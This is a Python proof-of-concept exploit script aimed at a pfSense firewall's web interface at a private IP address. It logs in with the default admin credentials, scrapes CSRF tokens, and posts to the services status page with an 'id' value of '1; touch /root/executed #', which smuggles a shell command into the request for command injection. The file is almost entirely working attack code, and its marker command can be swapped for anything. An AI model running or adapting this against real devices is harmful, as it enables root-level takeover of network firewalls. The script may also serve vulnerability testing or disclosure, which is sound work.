#!/usr/bin/env python3
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup

baseurl  = 'https://192.168.1.1'

target = baseurl + '/status_services.php'

login_data = {
    'login'        : 'Login',
    'usernamefld'  : 'admin',
    'passwordfld'  : 'pfsense',
}

target_data = {
    "ajax": "1",
    "service": "openvpn",
    "mode": "stopservice",
    "vpnmode": "server",
    "id": "1; touch /root/executed #"
}

headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0'}

with requests.Session() as s:
    # Fetch CSRF token from login page
    r = s.get(baseurl, headers=headers, verify=False)

    soup = BeautifulSoup(r.text, 'lxml')
    login_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Login
    r = s.post(baseurl, data=login_data, headers=headers)

    # Find the next CSRF token
    soup = BeautifulSoup(r.text, 'lxml')
    target_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Submit actual request
    r = s.post(target, data=target_data, headers=headers)

    # Dump response
    print(r.text)